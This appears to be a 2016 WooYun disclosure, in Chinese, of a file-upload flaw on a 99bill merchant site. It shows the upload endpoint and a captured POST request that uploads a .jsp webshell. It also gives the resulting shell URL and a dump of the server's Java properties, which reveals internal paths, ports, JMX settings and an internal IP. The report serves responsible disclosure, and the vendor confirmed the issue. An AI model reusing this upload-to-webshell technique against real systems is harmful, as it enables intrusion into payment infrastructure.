当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2016-0209324
漏洞标题:
快钱某站上传Getshell
相关厂商:
快钱
漏洞作者:
Vern
提交时间:
2016-05-16 16:02
修复时间:
2016-07-01 09:00
公开时间:
2016-07-01 09:00
漏洞类型:
文件上传导致任意代码执行
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2016-05-16: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经确认,细节仅向厂商公开
2016-05-27: 细节向核心白帽子及相关领域专家公开
2016-06-06: 细节向普通白帽子公开
2016-06-16: 细节向实习白帽子公开
2016-07-01: 细节向公众公开

简要描述:

快钱某站上传Getshell 入内网

详细说明:

上传点

https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=123@163.com


000.jpg


上传证件照片时抓包
图片直接选择jsp shell

1111.jpg


POST /nspwebsite/common/nsp/applyBuy.do?method=uploadPic HTTP/1.1
Host: ipos.99bill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=111@163.com
Cookie: JSESSIONID=D5DDB0B8E8F182523A54BFBE1DD0A61D.tomcatServer456-3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3238940103786
Content-Length: 7326
-----------------------------3238940103786
Content-Disposition: form-data; name="picF"; filename=".jsp


成功get shell
一句话

222.jpg

漏洞证明:

shell: 

https://ipos.99bill.com/nspwebsite/common/nsp/file/20160516154400407_.jsp


搜狗截图20160516154431.jpg


11111111111.jpg


内网

java.vendor  Sun Microsystems Inc.
sun.java.launcher  SUN_STANDARD
catalina.base  /opt/oracle/tomcat/t-3
sun.management.compiler  HotSpot 64-Bit Tiered Compilers
catalina.useNaming  true
app.path.prefix  /nfs/war//tomcat
os.name  Linux
sun.boot.class.path  /opt/oracle/soft/jdk1.6.0_29/jre/lib/resources.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/rt.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/sunrsasign.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/jsse.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/jce.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/charsets.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/modules/jdk.boot.jar:/opt/oracle/soft/jdk1.6.0_29/jre/classes
java.util.logging.config.file  /opt/oracle/tomcat/t-3/conf/logging.properties
com.sun.management.jmxremote  
java.vm.specification.vendor  Sun Microsystems Inc.
java.runtime.version  1.6.0_29-b11
app.context  nspwebsite
heapBin  /opt/log/tomcat/3-nspwebsite/dump/heap.hprof.`date +"%Y-%m-%d_%H-%M-%S"`
app.war.name  nspwebsite.war
https.port  8043
user.name  oracle
shared.loader  ${catalina.home}/shared,${catalina.home}/shared/lib,${catalina.home}/shared/lib/*.jar
tomcat.util.buf.StringCache.byte.enabled  true
java.naming.factory.initial  org.apache.naming.java.javaURLContextFactory
gcLog  /opt/log/tomcat/3-nspwebsite/gc/gc.log.`date +"%Y-%m-%d_%H-%M-%S"`
user.language  en
sun.boot.library.path  /opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64
shutdown.port  10003
http.port  8083
java.version  1.6.0_29
java.util.logging.manager  org.apache.juli.ClassLoaderLogManager
user.timezone  PRC
allowStart  true
sun.arch.data.model  64
java.endorsed.dirs  /opt/oracle/tomcat/t-3/endorsed
java.rmi.server.randomIDs  true
sun.cpu.isalist  
sun.jnu.encoding  UTF-8
file.encoding.pkg  sun.io
package.access  sun.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.,sun.beans.
file.separator  /
java.specification.name  Java Platform API Specification
java.class.version  50.0
user.country  US
java.home  /opt/oracle/soft/jdk1.6.0_29/jre
java.vm.info  mixed mode
os.version  2.6.32-504.16.2.el6.x86_64
jmx.port  6903
ajp.port  8013
com.sun.management.jmxremote.ssl  false
path.separator  :
java.vm.version  20.4-b02
java.awt.printerjob  sun.print.PSPrinterJob
group  
sun.io.unicode.encoding  UnicodeLittle
com.sun.management.jmxremote.authenticate  true
package.definition  sun.,java.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.
java.naming.factory.url.pkgs  org.apache.naming
user.home  /home/oracle
java.specification.vendor  Sun Microsystems Inc.
java.library.path  /opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64/server:/opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64:/opt/oracle/soft/jdk1.6.0_29/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.vendor.url  http://java.sun.com/
java.vm.vendor  Sun Microsystems Inc.
common.loader  ${catalina.base}/lib,${catalina.base}/lib/*.jar,${catalina.home}/lib,${catalina.home}/lib/*.jar
java.runtime.name  Java(TM) SE Runtime Environment
sun.java.command  org.apache.catalina.startup.Bootstrap start
java.class.path  /opt/oracle/tomcat/t-3/bin/bootstrap.jar:/opt/oracle/tomcat/t-3/bin/tomcat-juli.jar
app.log.path  /opt/log
tomcat.working.group  
com.sun.management.jmxremote.access.file  ../shared/conf/jmxremote.access
java.vm.specification.name  Java Virtual Machine Specification
java.vm.specification.version  1.0
catalina.home  /opt/oracle/tomcat/t-3
sun.cpu.endian  little
sun.os.patch.level  unknown
java.io.tmpdir  /opt/oracle/tomcat/t-3/temp
java.vendor.url.bug  http://java.sun.com/cgi-bin/bugreport.cgi
server.loader  
java.rmi.server.hostname  172.21.151.134
jvmRouteName  tomcatServer456-3
os.arch  amd64
java.awt.graphicsenv  sun.awt.X11GraphicsEnvironment
java.ext.dirs  /opt/oracle/soft/jdk1.6.0_29/jre/lib/ext:/usr/java/packages/lib/ext
user.dir  /opt/oracle/tomcat/t-3/bin
line.separator  
java.vm.name  Java HotSpot(TM) 64-Bit Server VM
file.encoding  UTF-8
com.sun.management.jmxremote.password.file  ../shared/conf/jmxremote.password
java.specification.version  1.6


修复方案:

版权声明:转载请注明来源 Vern@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-17 08:57

厂商回复:

感谢您对快钱的关注,我们将立刻安排修复!

最新状态:

暂无